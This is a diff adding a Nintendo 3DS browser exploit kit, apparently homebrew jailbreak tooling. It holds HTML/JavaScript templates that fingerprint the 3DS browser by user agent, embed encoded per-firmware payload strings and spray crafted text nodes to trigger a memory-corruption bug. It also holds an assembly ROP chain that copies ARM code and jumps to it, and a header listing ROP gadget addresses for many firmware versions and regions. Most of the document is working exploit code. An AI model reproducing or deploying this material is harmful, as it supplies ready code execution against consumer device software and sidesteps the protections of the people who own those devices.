+			'17567':'͜埄싼傳쨰͜埄싼찀ॸ㶬蕠ࢸ\0@#︈"싼찄ॸ諴"\0\0暔@#͜埄싼찀ॸ㶬찠ॸ\0ᡁ䀀\0蛜͜埄싼Ꜭ=㶬老\0ᡁ䀀\0쇠싼粘=諴"蒬ࢸ뼈\0\0ᡁ ᥙ䀀\0\0͜埄싼쨀㮚諴"\0\0䇸 @#@#@#蒌ࢸ@#@#@#@#@#@#@#@#@#@#@#@#萀ࢸ\0\0埄@#@#@#@#@#@#@#@#@#埄埄dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#̈́',
+			'17567C':'ﹸ埄싼傳럠ﹸ埄싼찀ॸ㶬Š࣌\0@#"싼찄ॸ犌"\0\0暔@#ﹸ埄싼찀ॸ㶬찠ॸ\0ᡁ䀀\0畀ﹸ埄싼꜌=㶬老\0ᡁ䀀\0봀싼粘=犌"¬࣌먨\0\0ᡁ ᥙ䀀\0\0ﹸ埄싼쨀㮚犌"\0\0䇸 @#@#@#࣌@#@#@#@#@#@#@#@#@#@#@#@#\0࣌\0\0埄@#@#@#@#@#@#@#@#@#埄埄dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#﹠',
+			'17567K':'﹌埄싼傳쪀﹌埄싼찀ॸ㶬Š࣍\0@#戴"싼찄ॸ艜"\0\0暔@#﹌埄싼찀ॸ㶬찠ॸ\0ᡁ䀀\0蜘﹌埄싼꜌=㶬老\0ᡁ䀀\0볔싼粘=艜"¬࣍맼\0\0ᡁ ᥙ䀀\0\0﹌埄싼쨀㮚艜"\0\0䇸 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0埄@#@#@#@#@#@#@#@#@#埄埄dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#︴',
+			'17567T':'ﹸ埄싼傳쫈ﹸ埄싼찀ॸ㶬Š࣍\0@#ﬠ"싼찄ॸ苘"\0\0暔@#ﹸ埄싼찀ॸ㶬찠ॸ\0ᡁ䀀\0蝠ﹸ埄싼꜌=㶬老\0ᡁ䀀\0봀싼粘=苘"¬࣍먨\0\0ᡁ ᥙ䀀\0\0ﹸ埄싼쨀㮚苘"\0\0䇸 @#@#@#࣍@#@#@#@#@#@#@#@#@#@#@#@#\0࣍\0\0埄@#@#@#@#@#@#@#@#@#埄埄dmc:/\0@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#﹠'
+		}[n.split('/').pop().replace(/[^\dCKT]/g,'')],
+		s=q.indexOf("dmc:/")+5;
+		q=q.substring(0,s)+l+"\0"+q.slice(s+l.length+1);
+		q+=Array(384-q.length+1+1).join('\0');
+		for(j=1;j<410;j++){
+			i=j/96,a=Array(j);
+			for(k=0;k<i;a[k++]=q);
+			m.push(d.createTextNode(String.fromCharCode.apply(null,Array(a))));
+		}
+	}
+}</script></head><body><h1>.</h1></body></html>
--- a/mset/rop3ds/index.html.template
+++ b/mset/rop3ds/index.html.template
@@ -0,0 +1,51 @@
+<html><head><script>
+d=document,r=parent,w=window,n=navigator.userAgent;
+if(r==w){
+	l='arm.dat',u=decodeURI(d.URL),g=u.split('?');
+	if(g.length>1){
+		g=g[1].split('&');
+		if(g[0].length>0&&g[0].length<25)l=g[0];
+	}
+	d.title='Load '+l;
+	w.onload=function(){
+		if(n.indexOf('1.7538.CN')>=0)n=n.replace('.CN',confirm('系统版本4.2-4.4选择OK，系统版本4.5选择取消。')?'.CN.42':'.CN.45');
+		d.body.childNodes[0].innerHTML=l+' loading<iframe height=0 src=#/>';
+	}
+}else{
+	w.onload=function(){
+		b=0,f=w.frameElement,p=f.parentNode,o=d.createElement('object');
+		o.addEventListener('beforeload',function(){
+			if(++b==1)p.addEventListener('DOMSubtreeModified',r.z);
+			else if(b==2)p.removeChild(f);
+		});
+		d.body.appendChild(o);
+	}
+}
+function z(){
+	if(n.indexOf('Nintendo 3DS')>=0){
+		m=[],q={'17412':'',
+			'17455':'',
+			'17498':'',
+			'17538C42':'',
+			'17538C45':'',
+			'17538K':'',
+			'17538T':'',
+			'17552':'',
+			'17552C':'',
+			'17552K':'',
+			'17552T':'',
+			'17567':'',
+			'17567C':'',
+			'17567K':'',
+			'17567T':''
+		}[n.split('/').pop().replace(/[^\dCKT]/g,'')],
+		s=q.indexOf("dmc:/")+5;
+		q=q.substring(0,s)+l+"\0"+q.slice(s+l.length+1);
+		q+=Array(384-q.length+1+1).join('\0');
+		for(j=1;j<410;j++){
+			i=j/96,a=Array(j);
+			for(k=0;k<i;a[k++]=q);
+			m.push(d.createTextNode(String.fromCharCode.apply(null,Array(a))));
+		}
+	}
+}</script></head><body><h1>.</h1></body></html>
--- a/mset/rop3ds/rop.S
+++ b/mset/rop3ds/rop.S
@@ -0,0 +1,21 @@
+	.arm
+	.text
+
+#include "rop.h"
+
+	.global	_start
+@---------------------------------------------------------------------------------
+_start:
+	rop_memcpy(BUFFER_LOC, ROP_LOC+arm_code, arm_code_end-arm_code)
+	rop_flush_data_cache(BUFFER_LOC, arm_code_end-arm_code)
+	rop_gx_texture_copy(BUFFER_LOC, CODE_TARGET, arm_code_end-arm_code)
+	rop_sleep(1000000000)
+	rop_jump_arm
+.align 4, GARBAGE
+arm_code:
+#ifdef ARM_CODE
+	#define S_(x)	#x
+	#define S(x)	S_(x)
+	.incbin S(ARM_CODE)
+#endif
+arm_code_end:
--- a/mset/rop3ds/rop.h
+++ b/mset/rop3ds/rop.h
@@ -0,0 +1,541 @@
+#define DLPLAY_CODE_LOC_VA		0x00192800
+#define DLPLAY_NSSHANDLE_LOC_VA		0x001A5200
+#define KPROCESS_HANDLE			0xFFFF8001
+#define GX_SetTextureCopy		0x00000004
+#define FILE_READ			0x00000001
+#define FILE_WRITE			0x00000002
+#define FILE_CREATE			0x00000004
+#define GARBAGE				0x00230040
+
+#if defined(MSET_4X) || defined(MSET_4X_DG)
+	#define ROP_LOC				0x002B0000
+	#define	HANDLE_PTR			0x0027FAC4
+	#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0013C5D4
+	#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x0027C580
+	#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x001AC924
+	#define LDR_R0_0_POP_R4_PC		0x0012FBBC
+	#define POP_PC				0x001002F9
+	#define	POP_R0_PC			0x00143D8C
+	#define POP_R1_PC			0x001C4FC4
+//	#define POP_R1_PC			0x001549E1
+	#define POP_R2_PC			0x0022952D
+	#define POP_R3_PC			0x0010538C
+	#define POP_R4_PC			0x001001ED
+//	#define POP_R4_PC			0x001B3AA0
+	#define POP_R0_R2_PC		0x0010F2B9
+	#define POP_R1_2_3_PC 0x001549B1
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x0018D5DC
+	#define POP_R4_LR_BX_R2			0x001D9360
+	#define STR_R1_0_POP_R4_PC		0x0010CCBC
+	#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x001B82A8
+	#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001B3954
+	#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001B3B50
+	#define SVC_0A_BX_LR			0x001AEA50
+	#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x001BFA60
+	#if defined(MSET_4X_DG) || defined(MSET_DG)
+		#define CODE_TARGET			0x17EB0000
+	#else
+		#define CODE_TARGET			0x17FAD000
+	#endif
+#elif defined(MSET_6X)
+	#define ROP_LOC				0x00290000
+	#define	HANDLE_PTR			0x0028DBEC
+	#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0013D3FC
+	#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x0028A580
+	#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x001B4E8C
+	#define LDR_R0_0_POP_R4_PC		0x00130818
+	#define POP_PC				0x001002F9
+	#define	POP_R0_PC			0x00144CF8
+	#define POP_R1_2_3_PC			0x0011BE4D
+	#define POP_R1_PC			0x001CD804
+	#define POP_R3_PC			0x00105110
+	#define POP_R4_PC			0x001001ED
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x0018B184
+	#define POP_R4_LR_BX_R2			0x00192758
+	#define STR_R1_0_POP_R4_PC		0x0010CF5C
+	#define SVC_0A_BX_LR			0x001B6C6C
+	#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x001C08B4
+	#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001BC188
+	#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001BC380
+	#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x001C814C
+	#define CODE_TARGET			0x17EA0000
+#elif defined(SPIDER_20) //1.7412.JP/US/EU
+	#define LDMFD_SP_R4_5_6_LR_BX_R12	0x0017E63C
+	#define LDMFD_SP_R4_5_PC		0x00101418
+	#define LDR_R0_0_POP_R4_PC		0x001CA228
+	#define POP_PC				0x0010D8B4
+	#define POP_R0_1_2_3_4_7_PC		0x001768FF
+	#define POP_R1_PC			0x0026A124
+	#define POP_R4_5_6_PC			0x00100D24
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x00103D3C
+	#define SP_LR_LDMFD_SP_LR_PC		0x002D5254
+	#define STR_R1_0_POP_R4_PC		0x00119768
+	#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x00332EBC
+	#define IFile_Open_LDMFD_SP_R4_5_6_7_PC	0x0025B8AC
+	#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x002FA3F0
+	#define DMC				0x002A497F
+	#define MAGIC				0x002D5240
+	#define ROP_LOC				0x08CF2000
+	#ifdef SPIDER_DG
+		#define CODE_TARGET			0x195CE000
+	#else
+		#define CODE_TARGET			0x192CD000
+	#endif
+#elif defined(SPIDER_21) //1.7455.JP/US/EU
+	#define LDMFD_SP_R4_5_6_LR_BX_R12	0x0017E764
+	#define LDMFD_SP_R4_5_PC		0x00101418
+	#define LDR_R0_0_POP_R4_PC		0x001CA350
+	#define POP_PC				0x0010D954
+	#define POP_R0_1_2_3_4_7_PC		0x00176A27
+	#define POP_R1_PC			0x0026A528
+	#define POP_R4_5_6_PC			0x00100D24
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x00103D3C
+	#define SP_LR_LDMFD_SP_LR_PC		0x002D5654
+	#define STR_R1_0_POP_R4_PC		0x00119864
+	#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x00333330
+	#define IFile_Open_LDMFD_SP_R4_5_6_7_PC	0x0025BC00
+	#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x002FA864
+	#define DMC				0x002A4C57
+	#define MAGIC				0x002D5640
+	#define ROP_LOC				0x08CF2000
+	#ifdef SPIDER_DG
+		#define CODE_TARGET			0x195CE000
+	#else
+		#define CODE_TARGET			0x192CD000
+	#endif
+#elif defined(SPIDER_4X) //1.7498.JP/US/EU
+	#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000-0x4000)
+	#define DLPLAY_HOOK_LOC			(0x1A3500-0x00100000+0x03F50000+0x14000000-0x4000)
+	#define	HANDLE_PTR			0x003B643C
+	#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x00344C2C
+	#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003F54E8
+	#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_PC	0x002CF3EC
+	#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x00354850
+	#define CALL_BX_LR			0x0025DFF0
+	#define CALL_BX_LR_2			0x00344B84
+	#define CALL_3				0x002C62E4				
+	#define LDMFD_SP_R4_5_6_LR_BX_R12	0x0018114C
+	#define LDMFD_SP_R4_5_PC		0x00101408
+	#define LDR_R0_0_POP_R4_PC		0x001CCC64
+	#define POP_LR_PC			0x002D6A34
+	#define POP_PC				0x0010DB6C
+	#define	POP_R0_PC			0x002AD574
+	#define POP_R1_2_3_PC			0x00217450
+	#define POP_R0_1_2_3_4_PC		0x0029C170
+//	#define POP_R0_1_2_3_4_PC		0x0022B550
+	#define POP_R0_1_2_3_4_7_PC		0x0017943B
+	#define POP_R1_PC			0x00269758
+	#define	POP_R2_PC			0x0012F815
+	#define POP_R2_3_PC			0x00231A24
+	#define POP_R2_3_4_PC			0x00101878
+	#define POP_R3_PC			0x0011B064
+	#define POP_R4_PC			0x0010DAA8
+	#define POP_R4_5_6_PC			0x00100D24
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x00103DA8
+	#define POP_R4_LR_BX_R2			0x00100C8C
+	#define SP_LR_LDMFD_SP_LR_PC		0x002D6A30
+	#define STR_R1_0_POP_R4_PC		0x00119B94
+//	#define STR_R1_0_POP_R4_PC		0x0016F3FC
+	#define SVC_0A_BX_LR			0x002A513C
+	#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x00332BE8
+	#define IFile_Open_LDMFD_SP_R4_5_6_7_PC	0x0025B0A4
+	#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x002FC8E4
+	#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00311D90
+	#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0029BF60
+	#define DMC				0x002A5F27
+	#define MAGIC				0x002D6A1C
+	#define ROP_LOC				0x08B47400
+//	#define ROP_LOC				0x08CF2000
+	#ifdef SPIDER_DG
+		#define CODE_TARGET			0x195D1000
+	#else
+		#define CODE_TARGET			0x192D3000
+	#endif
+#elif defined(SPIDER_42_CN) || defined(SPIDER_4X_KR) || defined(SPIDER_4X_TW) //1.7538.CN/KR/TW
+	#define CALL_3				0x0011DD48
+	#define DMC				0x0010509F //CN?
+	#define LDMFD_SP_R4_5_PC		0x00101A44
+	#define LDR_R0_0_POP_R4_PC		0x0011BADC
+	#define POP_PC				0x001057B4
+	#define	POP_R0_PC			0x0010C2F8
+	#define POP_R3_PC			0x001050D4
+	#define POP_R1_2_3_PC			0x00103DC8
+	#define POP_R4_5_6_PC			0x0010014C //CN?
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x00106598
+	#define STR_R1_0_POP_R4_PC		0x00106684
+	#if defined(SPIDER_42_CN) //1.7538.CN FW4.2
+		#define	HANDLE_PTR			0x003D9704
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD1C
+		#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D6C40
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA40
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0023F048
+		#define SVC_0A_BX_LR			0x00104218
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019B640
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022E334
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001674BC
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00167544
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B7F18
+		#define CALL_BX_LR			0x0023E4DC
+		#define CALL_BX_LR_2			0x00190118
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C469C
+		#define POP_LR_PC			0x0012FE98
+		#define POP_R0_1_2_3_4_7_PC		0x001932FB
+		#define POP_R1_PC			0x00226B2C
+		#define POP_R2_3_PC			0x0014C734
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE94
+		#define MAGIC				0x0012FE80
+		#ifdef SPIDER_DG
+			#define CODE_TARGET			0x19593000
+		#else
+			#define CODE_TARGET			0x19357000
+		#endif
+	#elif defined(SPIDER_4X_KR) //1.7538.KR
+		#define	HANDLE_PTR			0x003DA704
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BCF0
+		#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA14
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0023FF90
+		#define SVC_0A_BX_LR			0x00104218
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019C258
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022F284
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001680F8
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00168180
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B8B68
+		#define CALL_BX_LR			0x0023F424
+		#define CALL_BX_LR_2			0x00190D30
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C4EC4
+		#define POP_LR_PC			0x0012FE6C
+		#define POP_R0_1_2_3_4_7_PC		0x00193F13
+		#define POP_R1_PC			0x00227A28
+		#define POP_R2_3_PC			0x0014D2D8
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE68
+		#define MAGIC				0x0012FE54
+		#ifndef SPIDER_DG
+			#define CODE_TARGET			0x19255000
+		#endif
+	#elif defined(SPIDER_4X_TW) //1.7538.TW
+		#define	HANDLE_PTR			0x003DA704
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD1C
+		#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40 
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA40
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0023FFE4
+		#define SVC_0A_BX_LR			0x00104218
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019C260
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022F2D8
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001680FC
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00168184
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B8B70
+		#define CALL_BX_LR			0x0023F478
+		#define CALL_BX_LR_2			0x00190D34
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C4F14
+		#define POP_LR_PC			0x0012FE98
+		#define POP_R0_1_2_3_4_7_PC		0x00193F1B
+		#define POP_R1_PC			0x00227A64
+		#define POP_R2_3_PC			0x0014D29C
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE94
+		#define MAGIC				0x0012FE80
+		#ifndef SPIDER_DG
+			#define CODE_TARGET			0x19355000
+		#endif
+	#endif
+#elif defined(SPIDER_45_CN) //1.7538.CN FW4.5
+	#define CALL_3				0x0011DD68
+	#define DMC				0x001050CF
+	#define LDMFD_SP_R4_5_PC		0x00101A40
+	#define LDR_R0_0_POP_R4_PC		0x0011BB04
+	#define POP_LR_PC			0x0012FEA8
+	#define POP_PC				0x001057E4
+	#define	POP_R0_PC			0x0010C324
+	#define	POP_R1_PC			0x00226AF8
+	#define POP_R1_2_3_PC			0x00103DC0
+	#define POP_R2_3_PC			0x0014C26C
+	#define POP_R3_PC			0x00105104
+//	#define POP_R4_5_6_PC			0x?
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x001065C8
+	#define STR_R1_0_POP_R4_PC		0x001066B4
+	#define	HANDLE_PTR			0x003D9704
+	#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD30 
+	#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D6C40
+	#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA54 
+	#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0023EFA0 
+	#define SVC_0A_BX_LR			0x0010420C 
+	#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019B138 
+	#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022E2B0 
+	#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x00166FC8 
+	#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00167050 
+	#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C464C
+	#define CALL_BX_LR			0x0023E434
+	#define CALL_BX_LR_2			0x0018FC0C
+	#define POP_R0_1_2_3_4_7_PC		0x00112211
+	#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B7A10
+	#define SP_LR_LDMFD_SP_LR_PC		0x0012FEA4
+	#define MAGIC				0x0012FE90
+	#ifdef SPIDER_DG
+		#define CODE_TARGET			0x19593000
+	#else
+		#define CODE_TARGET			0x19357000
+	#endif
+#elif defined(SPIDER_5X) || defined(SPIDER_5X_CN) || defined(SPIDER_5X_KR) || defined(SPIDER_5X_TW)
+	#define CALL_3				0x0011DD80				
+	#define DMC				0x001050CB
+	#define LDMFD_SP_R4_5_PC		0x00101A40
+	#define LDR_R0_0_POP_R4_PC		0x0011BB00
+	#define POP_PC				0x001057E0
+	#define	POP_R0_PC			0x0010C320
+	#define POP_R1_2_3_PC			0x00103DC0
+	#define POP_R3_PC			0x00105100
+	#define POP_R4_5_6_PC			0x0010014C
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x001065C4
+//	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x0010CC4C
+	#define STR_R1_0_POP_R4_PC		0x001066B0
+	#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
+	#if defined(SPIDER_5X_CN) //1.7552.CN
+		#define	HANDLE_PTR			0x003DA70C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD48
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA6C
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0023F80C
+		#define SVC_0A_BX_LR			0x0010420C
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019B7D0
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022EA5C
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x0016751C
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001675A4
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B80A8
+		#define CALL_BX_LR			0x0023ECA0
+		#define CALL_BX_LR_2			0x001902A8
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C4E98
+		#define POP_LR_PC			0x0012FEC0
+		#define POP_R0_1_2_3_4_7_PC		0x0019348B
+		#define POP_R1_PC			0x002272A0
+		#define POP_R2_3_PC			0x0014C8AC
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FEBC
+		#define MAGIC				0x0012FEA8
+	#elif defined(SPIDER_5X_KR) //1.7552.KR
+		#define	HANDLE_PTR			0x003DA70C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD1C
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA40
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x002407DC
+		#define SVC_0A_BX_LR			0x0010420C
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CA78
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022FAC8
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001686FC
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00168784
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B9350
+		#define CALL_BX_LR			0x0023FC70
+		#define CALL_BX_LR_2			0x0019154C
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C5748
+		#define POP_LR_PC			0x0012FE94
+		#define POP_R0_1_2_3_4_7_PC		0x00194733
+		#define POP_R1_PC			0x00228274
+		#define POP_R2_3_PC			0x0014D49C
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FE90
+		#define MAGIC				0x0012FE7C
+	#elif defined(SPIDER_5X_TW) //1.7552.TW
+		#define	HANDLE_PTR			0x003DA70C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD48
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA6C
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x00240870
+		#define SVC_0A_BX_LR			0x0010420C
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CAC0
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022FB5C
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x00168744
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x001687CC
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B9398
+		#define CALL_BX_LR			0x0023FD04
+		#define CALL_BX_LR_2			0x00191594
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C57D8
+		#define POP_LR_PC			0x0012FEC0
+		#define POP_R0_1_2_3_4_7_PC		0x0019477B
+		#define POP_R1_PC			0x002282F0
+		#define POP_R2_3_PC			0x0014D4A4
+		#define SP_LR_LDMFD_SP_LR_PC		0x0012FEBC
+		#define MAGIC				0x0012FEA8
+	#else //1.7552.JP/US/EU
+		#define DLPLAY_CODE_LOC			(DLPLAY_CODE_LOC_VA-0x00100000+0x03F50000+0x14000000)
+		#define DLPLAY_HOOK_LOC			(0x1A3500-0x00100000+0x03F50000+0x14000000)
+		#define	HANDLE_PTR			0x003DA72C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012C228
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BF4C
+		#define BLX_R5_LDMFD_SP_R4_5_6_7_8_PC	0x001B9300
+		#define CALL_BX_LR			0x0023FFEC
+		#define CALL_BX_LR_2			0x001914FC
+		#define LDMFD_SP_R4_5_6_LR_BX_R12	0x002C5AC0
+		#define POP_LR_PC			0x001303A4
+		#define POP_R0_1_2_3_4_PC		0x0012A3D4
+		#define POP_R0_1_2_3_4_7_PC		0x001946E3
+		#define POP_R1_PC			0x00228B10
+		#define POP_R2_3_PC			0x0014D554
+		#define POP_R2_3_4_PC			0x001007B4
+		#define POP_R4_PC			0x0010510C
+		#define SP_LR_LDMFD_SP_LR_PC		0x001303A0
+		#define SVC_0A_BX_LR			0x0010420C
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019CA28
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022FE44
+		#define IFile_Read_LDMFD_SP_R4_5_6_7_8_9_PC	0x001686C0
+		#define IFile_Write_LDMFD_SP_R4_5_6_7_8_9_10_11_PC	0x00168748
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x00240B58
+		#define MAGIC				0x0013038C
+		#define ROP_LOC				0x08B85400
+//		#define ROP_LOC				0x088B5400
+//		#define ROP_LOC				0x08CF208C
+	#endif
+#elif defined(SPIDER_9X) || defined(SPIDER_9X_CN) || defined(SPIDER_9X_KR) || defined(SPIDER_9X_TW)
+	#define CALL_3				0x0011DD48				
+	#define DMC				0x001050B3
+	#define LDMFD_SP_R4_5_PC		0x00101A34
+	#define LDR_R0_0_POP_R4_PC		0x0011BACC
+	#define POP_PC				0x001057C4
+	#define	POP_R0_PC			0x0010C2FC
+	#define POP_R1_2_3_PC			0x00103DAC
+	#define POP_R3_PC			0x001050E8
+	#define POP_R4_5_6_PC			0x0010014C
+	#define POP_R4_5_6_7_8_9_10_11_12_PC	0x001065A8
+	#define STR_R1_0_POP_R4_PC		0x00106694
+	#define nn__gxlow__CTR__detail__GetInterruptReceiver	0x003D7C40
+	#if defined(SPIDER_9X_CN) //1.7567.CN
+		#define	HANDLE_PTR			0x003DA70C
+		#define GSPGPU_FlushDataCache_LDMFD_SP_R4_5_6_PC	0x0012BD00
+		#define nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue_LDMFD_SP_R4_5_6_7_8_9_10_PC	0x0012BA24
+		#define MEMCPY_LDMFD_SP_R4_5_6_7_8_9_10_LR	0x0023F808
+		#define SVC_0A_BX_LR			0x001041F8
+		#define FS_MOUNTSDMC_LDMFD_SP_R3_4_5_PC	0x0019B7E0
+		#define IFile_Open_LDMFD_SP_R4_5_6_7_8_PC	0x0022EA24
